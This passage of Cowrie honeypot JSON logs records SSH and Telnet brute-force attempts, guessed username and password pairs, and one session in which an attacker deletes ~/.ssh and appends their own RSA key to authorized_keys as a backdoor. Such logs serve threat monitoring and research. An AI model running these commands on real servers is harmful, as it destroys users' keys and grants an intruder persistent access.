{"eventid":"cowrie.client.kex","hassh":"03a80b21afa810682a776a7d42e5e6fb","hasshAlgorithms":"curve25519-sha256,curve25519-sha256@libssh.org,ecdh-sha2-nistp256,ecdh-sha2-nistp384,ecdh-sha2-nistp521,diffie-hellman-group18-sha512,diffie-hellman-group16-sha512,diffie-hellman-group-exchange-sha256,diffie-hellman-group14-sha256,ext-info-c,kex-strict-c-v00@openssh.com;chacha20-poly1305@openssh.com,aes256-gcm@openssh.com,aes128-gcm@openssh.com,aes256-ctr,aes192-ctr,aes128-ctr;hmac-sha2-256-etm@openssh.com,hmac-sha2-512-etm@openssh.com,hmac-sha2-256,hmac-sha2-512;none,zlib@openssh.com","kexAlgs":["curve25519-sha256","curve25519-sha256@libssh.org","ecdh-sha2-nistp256","ecdh-sha2-nistp384","ecdh-sha2-nistp521","diffie-hellman-group18-sha512","diffie-hellman-group16-sha512","diffie-hellman-group-exchange-sha256","diffie-hellman-group14-sha256","ext-info-c","kex-strict-c-v00@openssh.com"],"keyAlgs":["ssh-ed25519","ecdsa-sha2-nistp521","ecdsa-sha2-nistp384","ecdsa-sha2-nistp256","sk-ssh-ed25519@openssh.com","sk-ecdsa-sha2-nistp256@openssh.com","rsa-sha2-512","rsa-sha2-256"],"encCS":["chacha20-poly1305@openssh.com","aes256-gcm@openssh.com","aes128-gcm@openssh.com","aes256-ctr","aes192-ctr","aes128-ctr"],"macCS":["hmac-sha2-256-etm@openssh.com","hmac-sha2-512-etm@openssh.com","hmac-sha2-256","hmac-sha2-512"],"compCS":["none","zlib@openssh.com"],"langCS":[""],"message":"SSH client hassh fingerprint: 03a80b21afa810682a776a7d42e5e6fb","sensor":"my-vps","timestamp":"2025-09-08T12:59:04.270374Z","src_ip":"139.59.14.27","session":"b0b4ce62ec33"}
{"eventid":"cowrie.session.connect","src_ip":"212.227.235.229","src_port":45960,"dst_ip":"1.2.3.4","dst_port":22,"session":"f7f6b702f2af","protocol":"ssh","message":"New connection: 212.227.235.229:45960 (1.2.3.4:22) [session: f7f6b702f2af]","sensor":"my-vps","timestamp":"2025-09-08T12:59:05.345466Z"}
{"eventid":"cowrie.client.version","version":"SSH-2.0-libssh_0.11.1","message":"Remote SSH version: SSH-2.0-libssh_0.11.1","sensor":"my-vps","timestamp":"2025-09-08T12:59:05.346402Z","src_ip":"212.227.235.229","session":"f7f6b702f2af"}
{"eventid":"cowrie.client.kex","hassh":"03a80b21afa810682a776a7d42e5e6fb","hasshAlgorithms":"curve25519-sha256,curve25519-sha256@libssh.org,ecdh-sha2-nistp256,ecdh-sha2-nistp384,ecdh-sha2-nistp521,diffie-hellman-group18-sha512,diffie-hellman-group16-sha512,diffie-hellman-group-exchange-sha256,diffie-hellman-group14-sha256,ext-info-c,kex-strict-c-v00@openssh.com;chacha20-poly1305@openssh.com,aes256-gcm@openssh.com,aes128-gcm@openssh.com,aes256-ctr,aes192-ctr,aes128-ctr;hmac-sha2-256-etm@openssh.com,hmac-sha2-512-etm@openssh.com,hmac-sha2-256,hmac-sha2-512;none,zlib@openssh.com","kexAlgs":["curve25519-sha256","curve25519-sha256@libssh.org","ecdh-sha2-nistp256","ecdh-sha2-nistp384","ecdh-sha2-nistp521","diffie-hellman-group18-sha512","diffie-hellman-group16-sha512","diffie-hellman-group-exchange-sha256","diffie-hellman-group14-sha256","ext-info-c","kex-strict-c-v00@openssh.com"],"keyAlgs":["ssh-ed25519","ecdsa-sha2-nistp521","ecdsa-sha2-nistp384","ecdsa-sha2-nistp256","sk-ssh-ed25519@openssh.com","sk-ecdsa-sha2-nistp256@openssh.com","rsa-sha2-512","rsa-sha2-256"],"encCS":["chacha20-poly1305@openssh.com","aes256-gcm@openssh.com","aes128-gcm@openssh.com","aes256-ctr","aes192-ctr","aes128-ctr"],"macCS":["hmac-sha2-256-etm@openssh.com","hmac-sha2-512-etm@openssh.com","hmac-sha2-256","hmac-sha2-512"],"compCS":["none","zlib@openssh.com"],"langCS":[""],"message":"SSH client hassh fingerprint: 03a80b21afa810682a776a7d42e5e6fb","sensor":"my-vps","timestamp":"2025-09-08T12:59:05.605386Z","src_ip":"212.227.235.229","session":"f7f6b702f2af"}
{"eventid":"cowrie.login.success","username":"root","password":"3245gs5662d34","message":"login attempt [root/3245gs5662d34] succeeded","sensor":"my-vps","timestamp":"2025-09-08T12:59:05.738592Z","src_ip":"139.59.14.27","session":"b0b4ce62ec33"}
{"eventid":"cowrie.session.closed","duration":"2.2","message":"Connection lost after 2.2 seconds","sensor":"my-vps","timestamp":"2025-09-08T12:59:06.089916Z","src_ip":"139.59.14.27","session":"b0b4ce62ec33"}
{"eventid":"cowrie.session.closed","duration":"10.3","message":"Connection lost after 10.3 seconds","sensor":"my-vps","timestamp":"2025-09-08T12:59:06.102265Z","src_ip":"139.59.14.27","session":"291fbe9253bc"}
{"eventid":"cowrie.login.failed","username":"vladimir","password":"111111","message":"login attempt [vladimir/111111] failed","sensor":"my-vps","timestamp":"2025-09-08T12:59:06.680052Z","src_ip":"212.227.235.229","session":"f7f6b702f2af"}
{"eventid":"cowrie.session.closed","duration":"2.6","message":"Connection lost after 2.6 seconds","sensor":"my-vps","timestamp":"2025-09-08T12:59:07.949212Z","src_ip":"212.227.235.229","session":"f7f6b702f2af"}
{"eventid":"cowrie.session.connect","src_ip":"134.199.174.250","src_port":36752,"dst_ip":"1.2.3.4","dst_port":22,"session":"eb661b5c2abb","protocol":"ssh","message":"New connection: 134.199.174.250:36752 (1.2.3.4:22) [session: eb661b5c2abb]","sensor":"my-vps","timestamp":"2025-09-08T12:59:10.587592Z"}
{"eventid":"cowrie.client.version","version":"SSH-2.0-Go","message":"Remote SSH version: SSH-2.0-Go","sensor":"my-vps","timestamp":"2025-09-08T12:59:10.658017Z","src_ip":"134.199.174.250","session":"eb661b5c2abb"}
{"eventid":"cowrie.client.kex","hassh":"2ec37a7cc8daf20b10e1ad6221061ca5","hasshAlgorithms":"curve25519-sha256@libssh.org,ecdh-sha2-nistp256,ecdh-sha2-nistp384,ecdh-sha2-nistp521,diffie-hellman-group-exchange-sha256,diffie-hellman-group-exchange-sha1,diffie-hellman-group16-sha512,diffie-hellman-group14-sha256,diffie-hellman-group14-sha1,diffie-hellman-group1-sha1,ext-info-c,kex-strict-c-v00@openssh.com;aes128-ctr,aes192-ctr,aes256-ctr,aes128-gcm@openssh.com,aes256-gcm@openssh.com,chacha20-poly1305@openssh.com,arcfour256,arcfour128,arcfour,3des-cbc,aes128-cbc;hmac-sha2-256-etm@openssh.com,hmac-sha2-512-etm@openssh.com,hmac-sha2-256,hmac-sha2-512,hmac-sha1,hmac-sha1-96;none","kexAlgs":["curve25519-sha256@libssh.org","ecdh-sha2-nistp256","ecdh-sha2-nistp384","ecdh-sha2-nistp521","diffie-hellman-group-exchange-sha256","diffie-hellman-group-exchange-sha1","diffie-hellman-group16-sha512","diffie-hellman-group14-sha256","diffie-hellman-group14-sha1","diffie-hellman-group1-sha1","ext-info-c","kex-strict-c-v00@openssh.com"],"keyAlgs":["ssh-rsa","rsa-sha2-256","rsa-sha2-512","ssh-dss","ecdsa-sha2-nistp256","ecdsa-sha2-nistp384","ecdsa-sha2-nistp521","ssh-ed25519"],"encCS":["aes128-ctr","aes192-ctr","aes256-ctr","aes128-gcm@openssh.com","aes256-gcm@openssh.com","chacha20-poly1305@openssh.com","arcfour256","arcfour128","arcfour","3des-cbc","aes128-cbc"],"macCS":["hmac-sha2-256-etm@openssh.com","hmac-sha2-512-etm@openssh.com","hmac-sha2-256","hmac-sha2-512","hmac-sha1","hmac-sha1-96"],"compCS":["none"],"langCS":[""],"message":"SSH client hassh fingerprint: 2ec37a7cc8daf20b10e1ad6221061ca5","sensor":"my-vps","timestamp":"2025-09-08T12:59:10.888092Z","src_ip":"134.199.174.250","session":"eb661b5c2abb"}
{"eventid":"cowrie.login.failed","username":"test","password":"password1","message":"login attempt [test/password1] failed","sensor":"my-vps","timestamp":"2025-09-08T12:59:12.559546Z","src_ip":"134.199.174.250","session":"eb661b5c2abb"}
{"eventid":"cowrie.session.closed","duration":"3.3","message":"Connection lost after 3.3 seconds","sensor":"my-vps","timestamp":"2025-09-08T12:59:13.859965Z","src_ip":"134.199.174.250","session":"eb661b5c2abb"}
{"eventid":"cowrie.session.connect","src_ip":"212.227.235.229","src_port":51121,"dst_ip":"1.2.3.4","dst_port":23,"session":"c700a2e57ed8","protocol":"telnet","message":"New connection: 212.227.235.229:51121 (1.2.3.4:23) [session: c700a2e57ed8]","sensor":"my-vps","timestamp":"2025-09-08T12:59:19.627208Z"}
{"eventid":"cowrie.session.connect","src_ip":"212.227.235.229","src_port":59404,"dst_ip":"1.2.3.4","dst_port":22,"session":"11540ed119a9","protocol":"ssh","message":"New connection: 212.227.235.229:59404 (1.2.3.4:22) [session: 11540ed119a9]","sensor":"my-vps","timestamp":"2025-09-08T12:59:25.889618Z"}
{"eventid":"cowrie.client.version","version":"SSH-2.0-libssh_0.11.1","message":"Remote SSH version: SSH-2.0-libssh_0.11.1","sensor":"my-vps","timestamp":"2025-09-08T12:59:25.890755Z","src_ip":"212.227.235.229","session":"11540ed119a9"}
{"eventid":"cowrie.client.kex","hassh":"03a80b21afa810682a776a7d42e5e6fb","hasshAlgorithms":"curve25519-sha256,curve25519-sha256@libssh.org,ecdh-sha2-nistp256,ecdh-sha2-nistp384,ecdh-sha2-nistp521,diffie-hellman-group18-sha512,diffie-hellman-group16-sha512,diffie-hellman-group-exchange-sha256,diffie-hellman-group14-sha256,ext-info-c,kex-strict-c-v00@openssh.com;chacha20-poly1305@openssh.com,aes256-gcm@openssh.com,aes128-gcm@openssh.com,aes256-ctr,aes192-ctr,aes128-ctr;hmac-sha2-256-etm@openssh.com,hmac-sha2-512-etm@openssh.com,hmac-sha2-256,hmac-sha2-512;none,zlib@openssh.com","kexAlgs":["curve25519-sha256","curve25519-sha256@libssh.org","ecdh-sha2-nistp256","ecdh-sha2-nistp384","ecdh-sha2-nistp521","diffie-hellman-group18-sha512","diffie-hellman-group16-sha512","diffie-hellman-group-exchange-sha256","diffie-hellman-group14-sha256","ext-info-c","kex-strict-c-v00@openssh.com"],"keyAlgs":["ssh-ed25519","ecdsa-sha2-nistp521","ecdsa-sha2-nistp384","ecdsa-sha2-nistp256","sk-ssh-ed25519@openssh.com","sk-ecdsa-sha2-nistp256@openssh.com","rsa-sha2-512","rsa-sha2-256"],"encCS":["chacha20-poly1305@openssh.com","aes256-gcm@openssh.com","aes128-gcm@openssh.com","aes256-ctr","aes192-ctr","aes128-ctr"],"macCS":["hmac-sha2-256-etm@openssh.com","hmac-sha2-512-etm@openssh.com","hmac-sha2-256","hmac-sha2-512"],"compCS":["none","zlib@openssh.com"],"langCS":[""],"message":"SSH client hassh fingerprint: 03a80b21afa810682a776a7d42e5e6fb","sensor":"my-vps","timestamp":"2025-09-08T12:59:26.183182Z","src_ip":"212.227.235.229","session":"11540ed119a9"}
{"eventid":"cowrie.login.failed","username":"gabriel","password":"gabriel123","message":"login attempt [gabriel/gabriel123] failed","sensor":"my-vps","timestamp":"2025-09-08T12:59:27.379634Z","src_ip":"212.227.235.229","session":"11540ed119a9"}
{"eventid":"cowrie.session.closed","duration":"2.8","message":"Connection lost after 2.8 seconds","sensor":"my-vps","timestamp":"2025-09-08T12:59:28.673783Z","src_ip":"212.227.235.229","session":"11540ed119a9"}
{"eventid":"cowrie.session.connect","src_ip":"212.227.235.229","src_port":49998,"dst_ip":"1.2.3.4","dst_port":23,"session":"2428baafc4be","protocol":"telnet","message":"New connection: 212.227.235.229:49998 (1.2.3.4:23) [session: 2428baafc4be]","sensor":"my-vps","timestamp":"2025-09-08T12:59:31.823405Z"}
{"eventid":"cowrie.session.connect","src_ip":"212.227.235.229","src_port":53134,"dst_ip":"1.2.3.4","dst_port":22,"session":"e6a28433ed33","protocol":"ssh","message":"New connection: 212.227.235.229:53134 (1.2.3.4:22) [session: e6a28433ed33]","sensor":"my-vps","timestamp":"2025-09-08T12:59:32.258858Z"}
{"eventid":"cowrie.client.version","version":"SSH-2.0-libssh_0.11.1","message":"Remote SSH version: SSH-2.0-libssh_0.11.1","sensor":"my-vps","timestamp":"2025-09-08T12:59:32.260046Z","src_ip":"212.227.235.229","session":"e6a28433ed33"}
{"eventid":"cowrie.client.kex","hassh":"03a80b21afa810682a776a7d42e5e6fb","hasshAlgorithms":"curve25519-sha256,curve25519-sha256@libssh.org,ecdh-sha2-nistp256,ecdh-sha2-nistp384,ecdh-sha2-nistp521,diffie-hellman-group18-sha512,diffie-hellman-group16-sha512,diffie-hellman-group-exchange-sha256,diffie-hellman-group14-sha256,ext-info-c,kex-strict-c-v00@openssh.com;chacha20-poly1305@openssh.com,aes256-gcm@openssh.com,aes128-gcm@openssh.com,aes256-ctr,aes192-ctr,aes128-ctr;hmac-sha2-256-etm@openssh.com,hmac-sha2-512-etm@openssh.com,hmac-sha2-256,hmac-sha2-512;none,zlib@openssh.com","kexAlgs":["curve25519-sha256","curve25519-sha256@libssh.org","ecdh-sha2-nistp256","ecdh-sha2-nistp384","ecdh-sha2-nistp521","diffie-hellman-group18-sha512","diffie-hellman-group16-sha512","diffie-hellman-group-exchange-sha256","diffie-hellman-group14-sha256","ext-info-c","kex-strict-c-v00@openssh.com"],"keyAlgs":["ssh-ed25519","ecdsa-sha2-nistp521","ecdsa-sha2-nistp384","ecdsa-sha2-nistp256","sk-ssh-ed25519@openssh.com","sk-ecdsa-sha2-nistp256@openssh.com","rsa-sha2-512","rsa-sha2-256"],"encCS":["chacha20-poly1305@openssh.com","aes256-gcm@openssh.com","aes128-gcm@openssh.com","aes256-ctr","aes192-ctr","aes128-ctr"],"macCS":["hmac-sha2-256-etm@openssh.com","hmac-sha2-512-etm@openssh.com","hmac-sha2-256","hmac-sha2-512"],"compCS":["none","zlib@openssh.com"],"langCS":[""],"message":"SSH client hassh fingerprint: 03a80b21afa810682a776a7d42e5e6fb","sensor":"my-vps","timestamp":"2025-09-08T12:59:32.390783Z","src_ip":"212.227.235.229","session":"e6a28433ed33"}
{"eventid":"cowrie.session.closed","duration":12.958735942840576,"message":"Connection lost after 12 seconds","sensor":"my-vps","timestamp":"2025-09-08T12:59:32.585881Z","src_ip":"212.227.235.229","session":"c700a2e57ed8"}
{"eventid":"cowrie.login.failed","username":"lsfadmin","password":"0","message":"login attempt [lsfadmin/0] failed","sensor":"my-vps","timestamp":"2025-09-08T12:59:32.953219Z","src_ip":"212.227.235.229","session":"e6a28433ed33"}
{"eventid":"cowrie.session.closed","duration":"1.8","message":"Connection lost after 1.8 seconds","sensor":"my-vps","timestamp":"2025-09-08T12:59:34.087075Z","src_ip":"212.227.235.229","session":"e6a28433ed33"}
{"eventid":"cowrie.session.connect","src_ip":"134.199.174.250","src_port":43070,"dst_ip":"1.2.3.4","dst_port":22,"session":"0b81b6fac8d4","protocol":"ssh","message":"New connection: 134.199.174.250:43070 (1.2.3.4:22) [session: 0b81b6fac8d4]","sensor":"my-vps","timestamp":"2025-09-08T12:59:40.772901Z"}
{"eventid":"cowrie.client.version","version":"SSH-2.0-Go","message":"Remote SSH version: SSH-2.0-Go","sensor":"my-vps","timestamp":"2025-09-08T12:59:40.897895Z","src_ip":"134.199.174.250","session":"0b81b6fac8d4"}
{"eventid":"cowrie.client.kex","hassh":"2ec37a7cc8daf20b10e1ad6221061ca5","hasshAlgorithms":"curve25519-sha256@libssh.org,ecdh-sha2-nistp256,ecdh-sha2-nistp384,ecdh-sha2-nistp521,diffie-hellman-group-exchange-sha256,diffie-hellman-group-exchange-sha1,diffie-hellman-group16-sha512,diffie-hellman-group14-sha256,diffie-hellman-group14-sha1,diffie-hellman-group1-sha1,ext-info-c,kex-strict-c-v00@openssh.com;aes128-ctr,aes192-ctr,aes256-ctr,aes128-gcm@openssh.com,aes256-gcm@openssh.com,chacha20-poly1305@openssh.com,arcfour256,arcfour128,arcfour,3des-cbc,aes128-cbc;hmac-sha2-256-etm@openssh.com,hmac-sha2-512-etm@openssh.com,hmac-sha2-256,hmac-sha2-512,hmac-sha1,hmac-sha1-96;none","kexAlgs":["curve25519-sha256@libssh.org","ecdh-sha2-nistp256","ecdh-sha2-nistp384","ecdh-sha2-nistp521","diffie-hellman-group-exchange-sha256","diffie-hellman-group-exchange-sha1","diffie-hellman-group16-sha512","diffie-hellman-group14-sha256","diffie-hellman-group14-sha1","diffie-hellman-group1-sha1","ext-info-c","kex-strict-c-v00@openssh.com"],"keyAlgs":["ssh-rsa","rsa-sha2-256","rsa-sha2-512","ssh-dss","ecdsa-sha2-nistp256","ecdsa-sha2-nistp384","ecdsa-sha2-nistp521","ssh-ed25519"],"encCS":["aes128-ctr","aes192-ctr","aes256-ctr","aes128-gcm@openssh.com","aes256-gcm@openssh.com","chacha20-poly1305@openssh.com","arcfour256","arcfour128","arcfour","3des-cbc","aes128-cbc"],"macCS":["hmac-sha2-256-etm@openssh.com","hmac-sha2-512-etm@openssh.com","hmac-sha2-256","hmac-sha2-512","hmac-sha1","hmac-sha1-96"],"compCS":["none"],"langCS":[""],"message":"SSH client hassh fingerprint: 2ec37a7cc8daf20b10e1ad6221061ca5","sensor":"my-vps","timestamp":"2025-09-08T12:59:41.103070Z","src_ip":"134.199.174.250","session":"0b81b6fac8d4"}
{"eventid":"cowrie.login.failed","username":"test","password":"admin123","message":"login attempt [test/admin123] failed","sensor":"my-vps","timestamp":"2025-09-08T12:59:42.592579Z","src_ip":"134.199.174.250","session":"0b81b6fac8d4"}
{"eventid":"cowrie.session.closed","duration":"3.1","message":"Connection lost after 3.1 seconds","sensor":"my-vps","timestamp":"2025-09-08T12:59:43.922365Z","src_ip":"134.199.174.250","session":"0b81b6fac8d4"}
{"eventid":"cowrie.session.closed","duration":16.59327244758606,"message":"Connection lost after 16 seconds","sensor":"my-vps","timestamp":"2025-09-08T12:59:48.416594Z","src_ip":"212.227.235.229","session":"2428baafc4be"}
{"eventid":"cowrie.session.connect","src_ip":"212.227.235.229","src_port":39482,"dst_ip":"1.2.3.4","dst_port":22,"session":"c2bc7e4a976b","protocol":"ssh","message":"New connection: 212.227.235.229:39482 (1.2.3.4:22) [session: c2bc7e4a976b]","sensor":"my-vps","timestamp":"2025-09-08T12:59:50.689589Z"}
{"eventid":"cowrie.client.version","version":"SSH-2.0-libssh_0.11.1","message":"Remote SSH version: SSH-2.0-libssh_0.11.1","sensor":"my-vps","timestamp":"2025-09-08T12:59:50.690512Z","src_ip":"212.227.235.229","session":"c2bc7e4a976b"}
{"eventid":"cowrie.client.kex","hassh":"03a80b21afa810682a776a7d42e5e6fb","hasshAlgorithms":"curve25519-sha256,curve25519-sha256@libssh.org,ecdh-sha2-nistp256,ecdh-sha2-nistp384,ecdh-sha2-nistp521,diffie-hellman-group18-sha512,diffie-hellman-group16-sha512,diffie-hellman-group-exchange-sha256,diffie-hellman-group14-sha256,ext-info-c,kex-strict-c-v00@openssh.com;chacha20-poly1305@openssh.com,aes256-gcm@openssh.com,aes128-gcm@openssh.com,aes256-ctr,aes192-ctr,aes128-ctr;hmac-sha2-256-etm@openssh.com,hmac-sha2-512-etm@openssh.com,hmac-sha2-256,hmac-sha2-512;none,zlib@openssh.com","kexAlgs":["curve25519-sha256","curve25519-sha256@libssh.org","ecdh-sha2-nistp256","ecdh-sha2-nistp384","ecdh-sha2-nistp521","diffie-hellman-group18-sha512","diffie-hellman-group16-sha512","diffie-hellman-group-exchange-sha256","diffie-hellman-group14-sha256","ext-info-c","kex-strict-c-v00@openssh.com"],"keyAlgs":["ssh-ed25519","ecdsa-sha2-nistp521","ecdsa-sha2-nistp384","ecdsa-sha2-nistp256","sk-ssh-ed25519@openssh.com","sk-ecdsa-sha2-nistp256@openssh.com","rsa-sha2-512","rsa-sha2-256"],"encCS":["chacha20-poly1305@openssh.com","aes256-gcm@openssh.com","aes128-gcm@openssh.com","aes256-ctr","aes192-ctr","aes128-ctr"],"macCS":["hmac-sha2-256-etm@openssh.com","hmac-sha2-512-etm@openssh.com","hmac-sha2-256","hmac-sha2-512"],"compCS":["none","zlib@openssh.com"],"langCS":[""],"message":"SSH client hassh fingerprint: 03a80b21afa810682a776a7d42e5e6fb","sensor":"my-vps","timestamp":"2025-09-08T12:59:50.853238Z","src_ip":"212.227.235.229","session":"c2bc7e4a976b"}
{"eventid":"cowrie.login.success","username":"root","password":"Hello1234","message":"login attempt [root/Hello1234] succeeded","sensor":"my-vps","timestamp":"2025-09-08T12:59:51.545832Z","src_ip":"212.227.235.229","session":"c2bc7e4a976b"}
{"eventid":"cowrie.session.params","arch":"linux-x64-lsb","message":[],"sensor":"my-vps","timestamp":"2025-09-08T12:59:51.937253Z","src_ip":"212.227.235.229","session":"c2bc7e4a976b"}
{"eventid":"cowrie.command.input","input":"cd ~; chattr -ia .ssh; lockr -ia .ssh","message":"CMD: cd ~; chattr -ia .ssh; lockr -ia .ssh","sensor":"my-vps","timestamp":"2025-09-08T12:59:51.938124Z","src_ip":"212.227.235.229","session":"c2bc7e4a976b"}
{"eventid":"cowrie.command.failed","input":"lockr -ia .ssh","message":"Command not found: lockr -ia .ssh","sensor":"my-vps","timestamp":"2025-09-08T12:59:51.939364Z","src_ip":"212.227.235.229","session":"c2bc7e4a976b"}
{"eventid":"cowrie.log.closed","ttylog":"var/lib/cowrie/tty/c32b4937ce8564ea904a3bd2cb64805500ddfd28952a90fd55cb3c85d0be7644","size":32,"shasum":"c32b4937ce8564ea904a3bd2cb64805500ddfd28952a90fd55cb3c85d0be7644","duplicate":true,"duration":"0.2","message":"Closing TTY Log: var/lib/cowrie/tty/c32b4937ce8564ea904a3bd2cb64805500ddfd28952a90fd55cb3c85d0be7644 after 0.2 seconds","sensor":"my-vps","timestamp":"2025-09-08T12:59:52.104602Z","src_ip":"212.227.235.229","session":"c2bc7e4a976b"}
{"eventid":"cowrie.session.params","arch":"linux-x64-lsb","message":[],"sensor":"my-vps","timestamp":"2025-09-08T12:59:52.447611Z","src_ip":"212.227.235.229","session":"c2bc7e4a976b"}
{"eventid":"cowrie.command.input","input":"cd ~ && rm -rf .ssh && mkdir .ssh && echo \"ssh-rsa AAAAB3NzaC1yc2EAAAABJQAAAQEArDp4cun2lhr4KUhBGE7VvAcwdli2a8dbnrTOrbMz1+5O73fcBOx8NVbUT0bUanUV9tJ2/9p7+vD0EpZ3Tz/+0kX34uAx1RV/75GVOmNx+9EuWOnvNoaJe0QXxziIg9eLBHpgLMuakb5+BgTFB+rKJAw9u9FSTDengvS8hX1kNFS4Mjux0hJOK8rvcEmPecjdySYMb66nylAKGwCEE6WEQHmd1mUPgHwGQ0hWCwsQk13yCGPK5w6hYp5zYkFnvlC8hGmd4Ww+u97k6pfTGTUbJk14ujvcD9iUKQTTWYYjIIu5PmUux5bsZ0R4WFwdIe6+i6rBLAsPKgAySVKPRK+oRw== mdrfckr\">>.ssh/authorized_keys && chmod -R go= ~/.ssh && cd ~","message":"CMD: cd ~ && rm -rf .ssh && mkdir .ssh && echo \"ssh-rsa AAAAB3NzaC1yc2EAAAABJQAAAQEArDp4cun2lhr4KUhBGE7VvAcwdli2a8dbnrTOrbMz1+5O73fcBOx8NVbUT0bUanUV9tJ2/9p7+vD0EpZ3Tz/+0kX34uAx1RV/75GVOmNx+9EuWOnvNoaJe0QXxziIg9eLBHpgLMuakb5+BgTFB+rKJAw9u9FSTDengvS8hX1kNFS4Mjux0hJOK8rvcEmPecjdySYMb66nylAKGwCEE6WEQHmd1mUPgHwGQ0hWCwsQk13yCGPK5w6hYp5zYkFnvlC8hGmd4Ww+u97k6pfTGTUbJk14ujvcD9iUKQTTWYYjIIu5PmUux5bsZ0R4WFwdIe6+i6rBLAsPKgAySVKPRK+oRw== mdrfckr\">>.ssh/authorized_keys && chmod -R go= ~/.ssh && cd ~","sensor":"my-vps","timestamp":"2025-09-08T12:59:52.448409Z","src_ip":"212.227.235.229","session":"c2bc7e4a976b"}
{"eventid":"cowrie.session.file_download","duplicate":true,"outfile":"var/lib/cowrie/downloads/a8460f446be540410004b1a8db4083773fa46f7fe76fa84219c93daa1669f8f2","shasum":"a8460f446be540410004b1a8db4083773fa46f7fe76fa84219c93daa1669f8f2","destfile":"/root/.ssh/authorized_keys","message":"Saved redir contents with SHA-256 a8460f446be540410004b1a8db4083773fa46f7fe76fa84219c93daa1669f8f2 to var/lib/cowrie/downloads/a8460f446be540410004b1a8db4083773fa46f7fe76fa84219c93daa1669f8f2","sensor":"my-vps","timestamp":"2025-09-08T12:59:52.613947Z","src_ip":"212.227.235.229","session":"c2bc7e4a976b"}
{"eventid":"cowrie.log.closed","ttylog":"var/lib/cowrie/tty/cc1eb03e9b5926d8076e25826664a04400de854bf5cc660fa35eb86cbdf7dc0f","size":0,"shasum":"cc1eb03e9b5926d8076e25826664a04400de854bf5cc660fa35eb86cbdf7dc0f","duplicate":true,"duration":"0.2","message":"Closing TTY Log: var/lib/cowrie/tty/cc1eb03e9b5926d8076e25826664a04400de854bf5cc660fa35eb86cbdf7dc0f after 0.2 seconds","sensor":"my-vps","timestamp":"2025-09-08T12:59:52.614977Z","src_ip":"212.227.235.229","session":"c2bc7e4a976b"}
{"eventid":"cowrie.session.connect","src_ip":"212.227.235.229","src_port":39488,"dst_ip":"1.2.3.4","dst_port":22,"session":"0aaaf2a1b5df","protocol":"ssh","message":"New connection: 212.227.235.229:39488 (1.2.3.4:22) [session: 0aaaf2a1b5df]","sensor":"my-vps","timestamp":"2025-09-08T12:59:52.802333Z"}
{"eventid":"cowrie.client.version","version":"SSH-2.0-libssh_0.11.1","message":"Remote SSH version: SSH-2.0-libssh_0.11.1","sensor":"my-vps","timestamp":"2025-09-08T12:59:52.804950Z","src_ip":"212.227.235.229","session":"0aaaf2a1b5df"}
{"eventid":"cowrie.client.kex","hassh":"03a80b21afa810682a776a7d42e5e6fb","hasshAlgorithms":"curve25519-sha256,curve25519-sha256@libssh.org,ecdh-sha2-nistp256,ecdh-sha2-nistp384,ecdh-sha2-nistp521,diffie-hellman-group18-sha512,diffie-hellman-group16-sha512,diffie-hellman-group-exchange-sha256,diffie-hellman-group14-sha256,ext-info-c,kex-strict-c-v00@openssh.com;chacha20-poly1305@openssh.com,aes256-gcm@openssh.com,aes128-gcm@openssh.com,aes256-ctr,aes192-ctr,aes128-ctr;hmac-sha2-256-etm@openssh.com,hmac-sha2-512-etm@openssh.com,hmac-sha2-256,hmac-sha2-512;none,zlib@openssh.com","kexAlgs":["curve25519-sha256","curve25519-sha256@libssh.org","ecdh-sha2-nistp256","ecdh-sha2-nistp384","ecdh-sha2-nistp521","diffie-hellman-group18-sha512","diffie-hellman-group16-sha512","diffie-hellman-group-exchange-sha256","diffie-hellman-group14-sha256","ext-info-c","kex-strict-c-v00@openssh.com"],"keyAlgs":["ssh-ed25519","ecdsa-sha2-nistp521","ecdsa-sha2-nistp384","ecdsa-sha2-nistp256","sk-ssh-ed25519@openssh.com","sk-ecdsa-sha2-nistp256@openssh.com","rsa-sha2-512","rsa-sha2-256"],"encCS":["chacha20-poly1305@openssh.com","aes256-gcm@openssh.com","aes128-gcm@openssh.com","aes256-ctr","aes192-ctr","aes128-ctr"],"macCS":["hmac-sha2-256-etm@openssh.com","hmac-sha2-512-etm@openssh.com","hmac-sha2-256","hmac-sha2-512"],"compCS":["none","zlib@openssh.com"],"langCS":[""],"message":"SSH client hassh fingerprint: 03a80b21afa810682a776a7d42e5e6fb","sensor":"my-vps","timestamp":"2025-09-08T12:59:52.979600Z","src_ip":"212.227.235.229","session":"0aaaf2a1b5df"}
{"eventid":"cowrie.login.failed","username":"345gs5662d34","password":"345gs5662d34","message":"login attempt [345gs5662d34/345gs5662d34] failed","sensor":"my-vps","timestamp":"2025-09-08T12:59:53.687694Z","src_ip":"212.227.235.229","session":"0aaaf2a1b5df"}
{"eventid":"cowrie.session.closed","duration":"2.1","message":"Connection lost after 2.1 seconds","sensor":"my-vps","timestamp":"2025-09-08T12:59:54.866180Z","src_ip":"212.227.235.229","session":"0aaaf2a1b5df"}
{"eventid":"cowrie.session.connect","src_ip":"212.227.235.229","src_port":39490,"dst_ip":"1.2.3.4","dst_port":22,"session":"132d17f4f504","protocol":"ssh","message":"New connection: 212.227.235.229:39490 (1.2.3.4:22) [session: 132d17f4f504]","sensor":"my-vps","timestamp":"2025-09-08T12:59:55.040667Z"}
{"eventid":"cowrie.client.version","version":"SSH-2.0-libssh_0.11.1","message":"Remote SSH version: SSH-2.0-libssh_0.11.1","sensor":"my-vps","timestamp":"2025-09-08T12:59:55.041320Z","src_ip":"212.227.235.229","session":"132d17f4f504"}
{"eventid":"cowrie.client.kex","hassh":"03a80b21afa810682a776a7d42e5e6fb","hasshAlgorithms":"curve25519-sha256,curve25519-sha256@libssh.org,ecdh-sha2-nistp256,ecdh-sha2-nistp384,ecdh-sha2-nistp521,diffie-hellman-group18-sha512,diffie-hellman-group16-sha512,diffie-hellman-group-exchange-sha256,diffie-hellman-group14-sha256,ext-info-c,kex-strict-c-v00@openssh.com;chacha20-poly1305@openssh.com,aes256-gcm@openssh.com,aes128-gcm@openssh.com,aes256-ctr,aes192-ctr,aes128-ctr;hmac-sha2-256-etm@openssh.com,hmac-sha2-512-etm@openssh.com,hmac-sha2-256,hmac-sha2-512;none,zlib@openssh.com","kexAlgs":["curve25519-sha256","curve25519-sha256@libssh.org","ecdh-sha2-nistp256","ecdh-sha2-nistp384","ecdh-sha2-nistp521","diffie-hellman-group18-sha512","diffie-hellman-group16-sha512","diffie-hellman-group-exchange-sha256","diffie-hellman-group14-sha256","ext-info-c","kex-strict-c-v00@openssh.com"],"keyAlgs":["ssh-ed25519","ecdsa-sha2-nistp521","ecdsa-sha2-nistp384","ecdsa-sha2-nistp256","sk-ssh-ed25519@openssh.com","sk-ec